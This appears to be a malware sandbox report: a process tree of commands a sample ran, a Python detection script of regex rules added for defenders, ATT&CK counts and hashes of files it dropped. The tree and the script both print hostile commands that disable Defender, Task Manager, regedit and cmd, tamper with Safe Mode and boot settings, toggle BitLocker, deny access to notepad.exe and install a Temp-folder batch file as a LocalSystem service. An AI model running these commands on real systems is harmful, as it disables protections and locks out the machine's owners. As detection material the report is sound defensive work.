C:\Windows\system32\reg.exe  [depth 2, PID 5500]
  cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe  [depth 2, PID 2216]
  cmdline: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v DisableSettingsPage /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe  [depth 2, PID 2444]
  cmdline: reg add "HKCU\Control Panel\Desktop" /v PreferredUILanguages /t REG_MULTI_SZ /d ru-RU /f

C:\Windows\system32\reg.exe  [depth 2, PID 4968]
  cmdline: reg add "HKCU\Control Panel\International" /v sLanguage /t REG_SZ /d rus /f

C:\Windows\system32\reg.exe  [depth 2, PID 5476]
  cmdline: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe  [depth 2, PID 4452]
  cmdline: reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe  [depth 2, PID 5776]
  cmdline: reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f

C:\Windows\System32\Conhost.exe  [depth 3, PID 1216]
  cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\reg.exe  [depth 2, PID 5600]
  cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe  [depth 2, PID 1480]
  cmdline: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe  [depth 2, PID 3248]
  cmdline: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe  [depth 2, PID 4924]
  cmdline: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoExplorer /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe  [depth 2, PID 5852]
  cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "EnableScripts" /t REG_DWORD /d 0 /f

C:\Windows\system32\reg.exe  [depth 2, PID 2216]
  cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "ExecutionPolicy" /t REG_SZ /d "Restricted" /f

C:\Windows\System32\Conhost.exe  [depth 3, PID 5756]
  cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\reg.exe  [depth 2, PID 1472]
  cmdline: reg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AlternateShell" /ve /d "Empty" /f

C:\Windows\System32\Conhost.exe  [depth 3, PID 4968]
  cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\reg.exe  [depth 2, PID 6112]
  cmdline: reg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal" /ve /d "Empty" /f

C:\Windows\system32\reg.exe  [depth 2, PID 5272]
  cmdline: reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f

C:\Windows\system32\reg.exe  [depth 2, PID 5196]
  cmdline: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f
C:\Windows\system32\cmd.exe  [depth 2, PID 1664]
  cmdline: C:\Windows\system32\cmd.exe /c ipconfig | findstr IPv4

C:\Windows\system32\ipconfig.exe  [depth 3, PID 4200]
  cmdline: ipconfig
  - Gathers network information

C:\Windows\system32\findstr.exe  [depth 3, PID 5520]
  cmdline: findstr IPv4

C:\Windows\system32\cmd.exe  [depth 2, PID 5704]
  cmdline: C:\Windows\system32\cmd.exe /c whoami

C:\Windows\system32\whoami.exe  [depth 3, PID 3652]
  cmdline: whoami
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\cmd.exe  [depth 2, PID 5412]
  cmdline: C:\Windows\system32\cmd.exe /c net user "YCLEXTAL$"

C:\Windows\system32\net.exe  [depth 3, PID 5204]
  cmdline: net user "YCLEXTAL$"

C:\Windows\system32\takeown.exe  [depth 2, PID 4848]
  cmdline: takeown /f "C:\Windows\System32\notepad.exe"
  - Possible privilege escalation attempt
  - Modifies file permissions
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\icacls.exe  [depth 2, PID 5160]
  cmdline: icacls "C:\Windows\System32\notepad.exe" /deny Everyone:(RX)
  - Possible privilege escalation attempt
  - Modifies file permissions

C:\Windows\system32\manage-bde.exe  [depth 2, PID 1768]
  cmdline: manage-bde -off C:

C:\Windows\system32\manage-bde.exe  [depth 2, PID 5544]
  cmdline: manage-bde -on C: -exclude "C:\Windows" -exclude "C:\Users" -exclude "C:\Program Files" -exclude "C:\Program Files (x86)"

C:\Windows\system32\bcdedit.exe  [depth 2, PID 5872]
  cmdline: bcdedit /set {default} recoveryenabled yes
  - Modifies boot configuration data using bcdedit

C:\Windows\system32\bcdedit.exe  [depth 2, PID 1904]
  cmdline: bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
  - Modifies boot configuration data using bcdedit

C:\Windows\System32\Conhost.exe  [depth 3, PID 5600]
  cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\sc.exe  [depth 2, PID 708]
  cmdline: sc create MiServicio binPath= "C:\Users\Admin\AppData\Local\Temp\malware.bat" start= auto obj= "LocalSystem" DisplayName= "Mi Servicio"
  - Launches sc.exe

C:\Windows\System32\Conhost.exe  [depth 3, PID 5520]
  cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\net.exe  [depth 2, PID 5684]
  cmdline: net start MiServicio

C:\Windows\system32\net1.exe  [depth 3, PID 1912]
  cmdline: C:\Windows\system32\net1 start MiServicio
C:\Windows\system32\OpenWith.exe  [depth 1, PID 5844]
  cmdline: C:\Windows\system32\OpenWith.exe -Embedding
  - Drops file in System32 directory
  - Suspicious use of SetWindowsHookEx

C:\Windows\system32\OpenWith.exe  [depth 1, PID 2336]
  cmdline: C:\Windows\system32\OpenWith.exe -Embedding
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious use of SetWindowsHookEx

C:\Windows\system32\OpenWith.exe  [depth 1, PID 2444]
  cmdline: C:\Windows\system32\OpenWith.exe -Embedding
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious use of SetWindowsHookEx

C:\Windows\regedit.exe  [depth 1, PID 5372]
  cmdline: "regedit.exe" "C:\Users\Admin\Desktop\ExitComplete.reg"
  - Runs .reg file with regedit
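The command lines in the tree above are the useful part of this report for a detection engineer: a LocalSystem service whose binary is a .bat in the user's Temp, UAC and Defender switched off through policy keys, the firewall disabled and RDP opened, Safe Mode shell entries overwritten, a deny ACL on notepad.exe, and a browser launched to a URL that carries the username. The script below is an added example written for this page, not code from the sandbox or from the sample: it runs a small rule set over process-creation events of the form (image, command line), where the rules, the ATT&CK technique assigned to each rule (the manage-bde rule is deliberately left "unmapped") and the sample event list are this example's own assumptions; the sample command lines are copied from the tree above, plus two discovery-only lines the rules are expected to leave alone.

```python
"""Rule-based triage of Windows process-creation command lines.

Added example, not part of the sandbox report. The rules, their ATT&CK
mappings and the sample event list are this example's own assumptions;
the sample command lines themselves are copied from the process tree.
"""
import re
from collections import Counter
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    name: str       # what the command line does to the host
    technique: str  # ATT&CK technique assumed for the rule ("unmapped" if none)
    image: str      # executable that ran
    cmdline: str    # command line that matched


# (finding, technique, case-insensitive regex over the command line)
_RULES = [
    ("UAC disabled (EnableLUA=0)", "T1548.002",
     r'\bEnableLUA\b.*\s/d\s+0\b'),
    ("Defender disabled by policy (DisableAntiSpyware=1)", "T1562.001",
     r'\bDisableAntiSpyware\b.*\s/d\s+1\b'),
    ("Firewall turned off on all profiles", "T1562.004",
     r'advfirewall\s+set\s+allprofiles\s+state\s+off'),
    ("Inbound RDP (3389) allowed through the firewall", "T1562.004",
     r'advfirewall\s+firewall\s+add\s+rule\b.*\bdir=in\b.*\blocalport=3389\b'),
    ("RDP enabled (fDenyTSConnections=0)", "T1021.001",
     r'Terminal Server.*\bfDenyTSConnections\b.*\s/d\s+0\b'),
    ("Task Manager, regedit or cmd disabled for the user", "T1112",
     r'\b(?:DisableTaskMgr|DisableRegistryTools|DisableCMD)\b.*\s/d\s+[12]\b'),
    ("Safe Mode boot configuration tampered", "T1562.009",
     r'\\SafeBoot\\Minimal\b'),
    ("Boot failures hidden (bootstatuspolicy IgnoreAllFailures)", "T1490",
     r'bcdedit\b.*\bbootstatuspolicy\s+IgnoreAllFailures\b'),
    ("Autostart service whose binary is a script in user Temp", "T1543.003",
     r'\bsc\s+create\b.*\bbinPath=\s*"[^"]*\\AppData\\Local\\Temp\\[^"]*\.(?:bat|cmd|vbs|ps1)"'),
    ("Deny ACL placed on a System32 binary", "T1222.001",
     r'\bicacls\s+"C:\\Windows\\System32\\[^"]+"\s+/deny\b'),
    ("Browser launched to a URL carrying host identity", "T1071.001",
     r'--single-argument\s+https?://\S*\?id='),
    ("PowerShell locked down by policy", "T1112",
     r'\\PowerShell"?\s+/v\s+"?(?:EnableScripts|ExecutionPolicy)\b'),
    ("BitLocker state changed with manage-bde", "unmapped",
     r'\bmanage-bde\s+-(?:on|off)\b'),
]
RULES = [(n, t, re.compile(p, re.IGNORECASE)) for n, t, p in _RULES]


def classify(events):
    """One Finding per (event, rule) hit; an event may hit several rules."""
    return [Finding(name, tech, image, cmd)
            for image, cmd in events
            for name, tech, rx in RULES if rx.search(cmd)]


def unmatched(events):
    """Command lines no rule explains; these still need a human look."""
    return [cmd for _, cmd in events
            if not any(rx.search(cmd) for _, _, rx in RULES)]


def technique_counts(findings):
    return Counter(f.technique for f in findings)


REG = r"C:\Windows\system32\reg.exe"
EDGE = r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
# Constructed sample: (image, command line) pairs copied from the tree above,
# plus two discovery-only lines that the rules are expected to leave alone.
SAMPLE_EVENTS = [
    (REG, r'reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f'),
    (REG, r'reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f'),
    (r"C:\Windows\system32\netsh.exe", "netsh advfirewall set allprofiles state off"),
    (r"C:\Windows\system32\netsh.exe", 'netsh advfirewall firewall add rule name="Allow RDP" dir=in action=allow protocol=TCP localport=3389'),
    (REG, r'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'),
    (REG, r'reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f'),
    (REG, r'reg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AlternateShell" /ve /d "Empty" /f'),
    (r"C:\Windows\system32\bcdedit.exe", "bcdedit /set {default} bootstatuspolicy IgnoreAllFailures"),
    (r"C:\Windows\system32\sc.exe", r'sc create MiServicio binPath= "C:\Users\Admin\AppData\Local\Temp\malware.bat" start= auto obj= "LocalSystem" DisplayName= "Mi Servicio"'),
    (r"C:\Windows\system32\icacls.exe", r'icacls "C:\Windows\System32\notepad.exe" /deny Everyone:(RX)'),
    (EDGE, f'"{EDGE}" --single-argument https://perfect.wuaze.com/guardar_ip.php?id=admin123'),
    (REG, r'reg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "ExecutionPolicy" /t REG_SZ /d "Restricted" /f'),
    (r"C:\Windows\system32\manage-bde.exe", "manage-bde -off C:"),
    (r"C:\Windows\system32\ipconfig.exe", "ipconfig"),
    (r"C:\Windows\system32\net.exe", "net session"),
]

if __name__ == "__main__":
    for f in classify(SAMPLE_EVENTS):
        print(f"{f.technique:<10} {f.name}")
    print("unmatched:", unmatched(SAMPLE_EVENTS))
```

The rules key on the argument that does the damage (the value written, the port opened, the path of the service binary) rather than on the executable name, so a `reg add` that sets EnableLUA to 1 or a service whose binPath points at Program Files is not flagged. Everything that no rule explains is returned separately rather than dropped: in this run that is `ipconfig` and `net session`, which are discovery, not tampering, but still belong in the timeline.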
Network
MITRE ATT&CK Enterprise v15
Execution
  - Command and Scripting Interpreter (T1059): 1
  - System Services (T1569): 1
    - Service Execution (T1569.002): 1
Privilege Escalation
  - Abuse Elevation Control Mechanism (T1548): 1
    - Bypass User Account Control (T1548.002): 1
  - Create or Modify System Process (T1543): 2
    - Windows Service (T1543.003): 2
Downloads
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
  Filesize: 152B
  MD5: c9c4c494f8fba32d95ba2125f00586a3
  SHA1: 8a600205528aef7953144f1cf6f7a5115e3611de
  SHA256: a0ca609205813c307df9122c0c5b0967c5472755700f615b0033129cf7d6b35b
  SHA512: 9d30cea6cfc259e97b0305f8b5cd19774044fb78feedfcef2014b2947f2e6a101273bc4ad30db9cc1724e62eb441266d7df376e28ac58693f128b9cce2c7d20d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
  Filesize: 152B
  MD5: efccc7faf9d35f6829425651cf800edd
  SHA1: 0d7ada221f33b53d7d6a3671ffa9f3532694f1fe
  SHA256: 1fc2038b3cc76c3889043ea19543733a2f20387f340a371ae2027460e9c3a090
  SHA512: 0dbbd194c34f16a7355d93cdc47c646947e5d4671dc8931b364e1f42493c5b664a2d3b802663479eae3e26b17a4991f6600711593a54863d9b00d8e75552eafd

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
  Filesize: 152B
  MD5: 4dc6fc5e708279a3310fe55d9c44743d
  SHA1: a42e8bdf9d1c25ef3e223d59f6b1d16b095f46d2
  SHA256: a1c5f48659d4b3af960971b3a0f433a95fee5bfafe5680a34110c68b342377d8
  SHA512: 5874b2310187f242b852fa6dcded244cc860abb2be4f6f5a6a1db8322e12e1fef8f825edc0aae75adbb7284a2cd64730650d0643b1e2bb7ead9350e50e1d8c13

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_0
  Filesize: 44KB
  MD5: e874a18e144abad80f84b0ce0a850cda
  SHA1: c9fcf7a77a1d8d6e4aeded1f9dee73812aa4d7b6
  SHA256: d0fae510fa37af635b5025554c748cbbbc046f3b08644114f9f6037d1559fb4a
  SHA512: 6f1dcbbd8474bc3cfdbc48cc7dbff0765449012071d0d5f3bd1079ffaf63375710ede72653a445f6a38a126b74e335936d622f613dcd47064e6a0df1a92ab9ef

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_1
  Filesize: 264KB
  MD5: 62f5153e0d2cd98c45f6b6ce74440d4a
  SHA1: a66c21d4c26efd2f2c2b2a8d52be3be883179122
  SHA256: 9b4c402723307f8bdac940365678b3c7b674aad246c4df75f33828a5562d62ee
  SHA512: e0404578a7f6e97e119b530d9a4d947c34eace8f00f2def930ac4acedfcb1975efc76d443c68818d5a481b51da9dc4cfef2847476b29d27c01827635103837a3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_3
  Filesize: 4.0MB
  MD5: daee3b856479fc5b0545a2419faf9a3b
  SHA1: 491f71026ef1c229c53fe1ac49b5b450b38f88de
  SHA256: e9dd423e8e8fd20eecc215368bc367c772fac546a886447844f75b4c30d3da76
  SHA512: 8559237c349bda3304267b4df1fc932e9b1f42e033b51d4024ad3f356e560e7801dcc3d49ce930d1e192d6050196b576781e50c28d9d3f2c6f3b1e16fd8761ad

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
  Filesize: 96B
  MD5: fdfa568e4c7e2dc9a376df28b80ffdac
  SHA1: 92ab016cc47dee1efe945ab2abc7f9dc88d52d2f
  SHA256: 2a0ec4667ea752c7dd5433350330db80a17541a9cb2de5658f534ac2b86ebbf0
  SHA512: a1c43a9a87cc5d201b0fafaa7ca06294b8a54b37f882d66fd3d4ebaaba70e9e7f61e5044a39735aad5a37c6ea37fdf3f1635a885842545f434d2b542097ae0e0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
  Filesize: 72B
  MD5: c84f921704a54366b00f87e147e96f17
  SHA1: 4d494f443e375ac012eb82ddaab1b58ff37f685e
  SHA256: 45ffef33af9b503c91b32b33217ecd6126fd5d69a23965ad7e6d147f09dcb947
  SHA512: 6a9be66b005fbf388cd953b100c4b72d5094e0c81ce914ed9878bafbef02a72a4989e2b03f4c3b4eac92b73c8b15bc04c2814674beab910620bf5dd316f4ec1d
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies
  Filesize: 20KB
  MD5: 32162557a2897e234bfd98f10e3ff2f7
  SHA1: 4824ed7180691a2ed71ec6cdcec72ba91b14644a
  SHA256: 750c65316cc6caf34662d5a198a5c6b923a36f0f163828ae19f1711d6786101f
  SHA512: c5b1c8d4a3ee419db109598365347005805030cd0f87705b8646aedb07994d034eb3483ccf3acb444e4b524c0a64d8331861bbd827e3440df5eb3321ddf0c370

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG
  Filesize: 322B
  MD5: cd64e2723d14ba0fd84e38759c5252bc
  SHA1: 5a32fa68be97533eabcf8daeade3fdba473fa905
  SHA256: 85d1678b2e4edf3f884dda99e7239bd35d4a70081239a91bcf1280c0f4490e05
  SHA512: 7aaf6148b87d1c427b248e4372342686a05a36b13231e2c5e56ad75b7ee8f093dba1184e6337d919141ac6cb8d53b954244db2f38e9afd224e694464c23a0d1d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_1
  Filesize: 264KB
  MD5: 982893abdf13b4ec8632c10a09d45172
  SHA1: 1ffba5041436e13caef028d298521247f1d69de4
  SHA256: 253c89648ab906908d19069ad2978c64b8e3af5d7fe3dfa7dfb9f934f464e45f
  SHA512: 9c7b5199ac28dcebc4707db88ab520db5c01bc17c8a4e648dd7d8b3d7ccd89c3808e9178ef8277461a206915a5404de6b15590588cf882f812a23e3c86805749

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History
  Filesize: 124KB
  MD5: 09a951e1041e79921081ffc272d75575
  SHA1: 1429b12822baae80d85f0598bbc56bf59decd25d
  SHA256: 16b91877572be2da8a2c4be72217782122a6133cee58621081a7151c32105487
  SHA512: 6521d9097976e8babc44bcc55b752a100ed7f4501ca47011f5585175ea816d12ac09825c4858ae52e70c6cd2f0045d7dc4705a3050e14416def0019e116e3496

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History Provider Cache
  Filesize: 804B
  MD5: 325c81b304b78d7c2690ff789d59f4d3
  SHA1: 3ff6599574aebccd713aad7074be14e7e9dbc6b9
  SHA256: 9d65fa6dfa2e7784c52ecab340cbe240afcec1d46306a27896ace7b962cfb416
  SHA512: 796120efc9c20d15cd571b1aba321c0f17cf5c5f48140eca9fead75ff97dcc8652f2e9e1b1ccd0db8f4e2d678fea2bcf22d77991d07306198fb7933fbe739753

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History-journal
  Filesize: 20KB
  MD5: 50cbdaf407afb94ca0facb2010893c9b
  SHA1: 30b31666e7a130829c32e3b3406fdeb616373ceb
  SHA256: 7f4c482db59fa3b4511a004a2eb33c0e6cf3ae660943be5fa182bded4c2fca25
  SHA512: b1d83dca8abddd7ce03c790588929376b296f38cf8fa517855ea882418f9e7c0c38f629e5e19a1ca0b6cf88fcefbe6c219b1344e0958076ce61cdc66be6aed74

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG
  Filesize: 334B
  MD5: 5f3f634db7d25da1ed4cf98f1b62616a
  SHA1: 38a953ddc262f3bcdfafdeb9bfa56512afe327bc
  SHA256: 62cf18feb1f690e0cd6495eeefaf0c6a3e86173c3e587ecfecc3a94964650cb1
  SHA512: e7c8464a50ade60bfa68c3c169492a88c01fe964ffe06fa723203a2d77115fd77448ea4cd1bf49e05443f45738036a4e23a113e675b0752dd5d9f7b3809bb3a5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Action Predictor
  Filesize: 36KB
  MD5: cf4b0a74bdc68a111bd7ccbd8569daa5
  SHA1: e567e83b8db5476018dfed63802d0f60690c8139
  SHA256: f79fc9fca22eace1d33311f380f135b75b30baa639f2d819fa437580ef268b6d
  SHA512: 4ffda967282821d319e22334cc4410eb8883b436654c2ffa65a7a75fdac296a349a672c734e8fed023b9b34d5f17d1af611f81d433108f898459b5ae412dac9f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
  Filesize: 6KB
  MD5: 6805a029aa408017e0f75fcc43a0f427
  SHA1: 9d82b733293379d2aaf08d584f7b5d4277be1ee6
  SHA256: 0b6fad0c6c668865cccd568dc09b385c3175152bf2f1f0f58076e170df5cdca3
  SHA512: 4d70268ee9370d3d7cc3a997ee779f836d13d44498a30763548b9b6d9004e50d1fef8dafd66612983adf1c9ba132c827a3e085b64e7bc848dd522f3144b74501
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
  Filesize: 5KB
  MD5: e21124767d3ed09b0e8e5463807aa59c
  SHA1: 7b26599505aada13f2254520afe3741c1bb0c0de
  SHA256: 0bed56ea7482ed14a95f3ebbd13b56d12f474bf4b96ba2a060753ce3da8a8c6e
  SHA512: 13a1354bf4bc51de034049983130eb64946ecb46873613746cd934d0761ea79a27c2745b242b7dbeff768b225faa577aafc8aaa4a9905183fc8bb1d0596c6abe

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
  Filesize: 6KB
  MD5: 901a1076eefc08aaf4d12e1627c48376
  SHA1: fdf169cd35a3de9130a2cce003f1cf8a7759982b
  SHA256: a25b769e567037f6c2ba69ace18960dbd5bdec73696629779d121e9f34decd10
  SHA512: 577e808ceca33600a331dbe9c41085118bb89315c5e09c2862dbecab116564778a0537749c49be797bd286d67ebf2fe81f15fdf1056d2a2c5eb8907ce787f910

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
  Filesize: 6KB
  MD5: 68cb7abcfaaea97c5b7a003b11b2d054
  SHA1: e965aa9b0461f74a12d4897b8235ed2a2fffbc4e
  SHA256: 2c1d44151befa0b33d4bf93a3f1f668976ed2089944ef61f6e486ed7606ecd89
  SHA512: 280bfd712dd55913100e919bf396766a080c77c1d3f5b949bc78193c40d51574d69fbe7426473c69f2f261773583488c41ffc17ec44914e75e383f1c6446dc7b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
  Filesize: 6KB
  MD5: d89beb5ba662fee38c6d6a2cd333263b
  SHA1: 07e775c85610c6d5eb143afd731fd9ddaa94ce72
  SHA256: 867cff30d3e96fff36e34b9dff42420a1a7223e0883776057076eba6b4125062
  SHA512: cd43e30a8d02fab05646f0dba67e7119c5c14b60763c96a627bf0956456040fc7f4139c482aa1ea679ac4bf6665332924db960deeaa7565405aaa8216162d2f2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
  Filesize: 7KB
  MD5: 1d53d7b50e841274c637a20a544b1358
  SHA1: 0d9e83dccd8d784f9214e01b5d2e6b55ad6c6443
  SHA256: 0f3d8ed8b903fd484ddddb9c91344b2b88c51be80137ba5e11065fbd04b804a2
  SHA512: 36ae7c18634464dffb9f575875d1a8b49518bc5867260a60254fc47395a7e8a279c54cb3786af96012b6f2d5ab2e73ef3887384451c13c74dd721c99be54c5fa

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
  Filesize: 7KB
  MD5: 4acec5149eb5c76bd01ac0ca754d9cbc
  SHA1: ce55416f50caf2c1140dfb8d95ad1ee41239156a
  SHA256: f707ac4907ca2f2c413984e39c44699a6252a2cc851f20ca0e57bf3761c534ec
  SHA512: 520ece2659965e28de095ed1864adf51ef4d7d3f048f494cd1a61ad96c367573a2a8326443f0d237f86a844ca3cd1ee93bf9491ce3954edff3d6939eb6804505

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferredApps
  Filesize: 33B
  MD5: 2b432fef211c69c745aca86de4f8e4ab
  SHA1: 4b92da8d4c0188cf2409500adcd2200444a82fcc
  SHA256: 42b55d126d1e640b1ed7a6bdcb9a46c81df461fa7e131f4f8c7108c2c61c14de
  SHA512: 948502de4dc89a7e9d2e1660451fcd0f44fd3816072924a44f145d821d0363233cc92a377dba3a0a9f849e3c17b1893070025c369c8120083a622d025fe1eacf

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log
  Filesize: 213B
  MD5: 046cc08d163fc4578cd1b77a5d0965ac
  SHA1: 92f503e605c30974baf385f1619f1269b81dec57
  SHA256: 693a60684aa9ff4f01cb6027e9c938f4701c0c898afc224a0776cb1e18e87166
  SHA512: e8b1df36a237bcbbad897146ca247edf75466b2a4030fec620c46932b5c31137f2931cd2758534e4308aed3fb9cc40edf2d7646a38530bcc5e6d7069c19a3b1f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG
  Filesize: 322B
  MD5: 6cfe76389492616226eec1ef5c93f670
  SHA1: 779b1cb38c67716b53c1bbb7b8675bc4d1a2c401
  SHA256: d09da5c5319c5309924a46527f9b7ad0ac57909d68a41c04a4faa9b534faf76a
  SHA512: 70903102111e451961d2b76223dc7c57f728b1e5dbbb9268434496c91baf498b144b6a22b746cabf6666cd35f837db9f7f0114ad0389f0da5182d52165d32ae4
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13360607723244648
  Filesize: 2KB
  MD5: 0985a86600accfef7bca94b2c1a1f307
  SHA1: 1e2939703ff89d4c601b790630b8b06a18d8eb69
  SHA256: 1da516e0c9380326af14db143133a2d13e01b64cd937c0fa5b9ee2fb0c60b0d0
  SHA512: 79879ca965ef0717707a5283d6c2cb86cffb759f1d1884ee11af538ec441ef9d82b3bb89577b8b4fb6dc9e4bd05103c3b2f829496643b3012145e567ed742e3b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Tabs_13360607723415648
  Filesize: 2KB
  MD5: 524af9e1a1b4eded0bda6a5f55e985e3
  SHA1: 78c58cb66bb281ff99814d50b1c7d68318c43338
  SHA256: b00f29b8645456cfae5206b26cce0d28421da3eb7b17f4697c6c33785e73181f
  SHA512: bd1cee86e200bd402ea18e24d84b7ef3a21a91f7cd0b101202859cf5ce74eba0e445513548deb8919bf5e5bfb6d56d492e2574647cb83195698d844592609266

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Shortcuts
  Filesize: 20KB
  MD5: fca621466ede4c2499ecb9f3728e63ab
  SHA1: 3d5d4cd0fa702371f9d1a40e72e1fe19d194a3c4
  SHA256: c6dde84fb40fb69d1a6637fe6bf781de51a4c24e45b616e8f97afd3c6fe200b8
  SHA512: aa12ed8c1ff85af4375ac80d7fe494d6f8a70ddb3357c186a0c1ade9bbcc3efc3de5fb0ad4b81eb2ab9bc916b6adf8b76c30203f78e38cd00af5fa4ccf3e3760

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\000003.log
  Filesize: 112B
  MD5: 932788bec7161a164875f2c4983cc7be
  SHA1: ecd075074470615b3c22da7b5278ce3817e70dff
  SHA256: 91f6cd2309f3d03698be878a0aa4e4cb41ace0e191830bd877fb1f1f9c6a7757
  SHA512: 937fde7edec478460ecf814ee7597fe2c16833087197625a81b89013b5dc6d05bd9f5643a8f5aa0ca9c69f4b4755e4537f2127aad1a63c09542658f1bde72fd5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG
  Filesize: 347B
  MD5: 541c6a6386686313f08cdfc27912155a
  SHA1: 3feff2bafbc294317bae64560537d40101f42e30
  SHA256: 1168416c77a25e7d5895a2ce0cf97ecff02ad5014231eb74b80550b0da646762
  SHA512: c508662846587edeacc2d9ffc4628febe6e52358699a614659136599ba814f49ec3d291b46e4c96a0551335709bdf153c66ba6d20002fda205620e8811fced33

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG
  Filesize: 323B
  MD5: b23fd064cf85c9c564ada42515433c8c
  SHA1: 3268faba94f2fe480a76f262bfcac3ee24f0820a
  SHA256: 58a7cd876754bc92d9e17f0707bb0e3d1ef95ef0d30660fc6f9b840478bbc906
  SHA512: 03b870590d55ed88746e7ce8e7e831efcdd63108545fe5228491fded20f80421e26b528365c14a1dec8855f1cbe8644fba1e7c5df0ad3a354eea0efd8bc6ec52

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Visited Links
  Filesize: 128KB
  MD5: 12b09d513c3553b426409a7d35ea6e4d
  SHA1: 1cd1f7f404ab150a6474647e0a623d7dc187bc42
  SHA256: 94cabeb5424f36c8784a85d6634cf85decffe1b6fb3afa9ba55652d2294d9403
  SHA512: 3ccb2d8e12c698a3d751c3cb0c04fed470d1abfcafe6269f3f4ecac73eb91b374588747055b57ae3152bc4cf91749fbf5638b3d2dacf84eba9b4209a1c89eccb

